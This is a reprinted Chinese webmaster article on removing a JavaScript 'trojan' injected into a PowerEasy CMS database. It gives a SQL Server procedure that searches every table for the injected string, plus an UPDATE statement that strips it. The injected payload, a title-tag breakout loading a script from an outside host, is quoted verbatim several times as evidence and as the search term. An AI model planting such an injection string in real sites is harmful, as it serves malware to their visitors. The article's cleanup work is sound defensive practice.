加入收藏 | 设为首页 | 会员中心 | 我要投稿 银川站长网 (https://www.0951zz.com/)- 云通信、基础存储、云上网络、机器学习、视觉智能!
当前位置: 首页 > 服务器 > 安全 > 正文

解析 木马 手动删去动易数据库被注入JS代码的方式

发布时间:2023-03-28 11:11:51 所属栏目:安全 来源:
导读:问题:动易数据库连续几天被注入JS代码,那么可不可以直接从数据库着手进行清除木马代码操作呢?数据库被注入的代码是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--解决:发现在PE_CLA

问题:动易数据库连续几天被注入JS代码,那么可不可以直接从数据库着手进行清除木马代码操作呢?

数据库被注入的代码是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--

解决:发现在PE_CLASS表中的tips、Meta_Keywords、Meta_Description、LinkUrl字段存在注入的JS,表太多,一个一个去查,是比较费时费力的,那么我们可以通过一个全库搜索的方法,建立一个存储过程

create  proc  p_search  

 @str  Nvarchar(1000)  --要搜索的字符串  

 as  

 if  @str=''  return  

 declare  @s  Nvarchar(4000)  

 create  table  #t(表名  sysname,字段名  sysname)  

 declare  tb  cursor  local  for  

 select  s='if  exists(select  1  from  ['+replace(b.name,']',']]')+']  where  ['+a.name+']  like  N''%'+@str+'%'')  

 print  ''所在的表及字段:  ['+b.name+'].['+a.name+']'''  

 from  syscolumns  a  join  sysobjects  b  on  a.id=b.id  

 where  b.xtype='U'  and  a.status>=0  

 and  a.xtype  in(175,239,99,35,231,167)  

 open  tb  

 fetch  next  from  tb  into  @s  

 while  @@fetch_status=0  

 begin  

 exec(@s)  

 fetch  next  from  tb  into  @s  

 end  

 close  tb  

 deallocate  tb

GO

执行:p_search '"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'

找到被注入的表及字段,执行恢复操作,下面是一个例子

UPDATE PE_Class SET Tips= Replace(Tips,'"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--','')

(编辑:银川站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!